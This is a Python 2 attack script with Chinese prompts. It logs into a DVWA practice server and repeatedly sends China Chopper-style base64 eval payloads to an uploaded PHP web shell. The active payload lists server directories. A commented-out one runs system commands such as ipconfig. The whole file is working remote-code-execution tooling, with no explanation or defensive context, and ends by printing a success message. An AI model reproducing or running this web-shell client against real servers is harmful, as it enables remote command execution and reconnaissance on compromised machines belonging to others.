# -*- coding: utf-8 -*-

import requests


attack_ip=raw_input("输入靶机的IP，如果有端口需要带上端口，例：192.168.0.40:88i/172.86.121.120 \n")
attack_times=int(raw_input("输入攻击的次数 \n"))
s = requests.session()
login_url = 'http://' + attack_ip + '/dvwa/login.php' #自己的靶机需要修改路径
attack_url='http://' + attack_ip + '/hackable/uploads/1.php'
fangwen_login = {
    'username': 'admin',
    'password': 'admin',
    'Login': 'Login'
}

# fangwen_xm1= "1=@eval(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QvZCJDOlxkdndhLXYxLjJcaGFja2FibGVcdXBsb2Fkc1wiJmlwY29uZmlnJmVjaG8gW1NdJmNkJmVjaG8gW0Vd"
fangwen_xm2= "1=@eval(base64_decode($_POST[action]));&action=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcZHZ3YS12MS4yXGR2d2FcaW1hZ2VzXA%3D%3D"
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
'Content-Type':'application/x-www-form-urlencoded'
		}
dvwa_login = s.post(login_url,data=fangwen_login,headers=headers)
while attack_times>1:
		
		dvwa_attack=s.post(attack_url,data=fangwen_xm2,headers=headers)
		attack_times=attack_times -1
else:
	
	dvwa_attack=s.post(attack_url,data=fangwen_xm2,headers=headers)
print ('攻击成功！')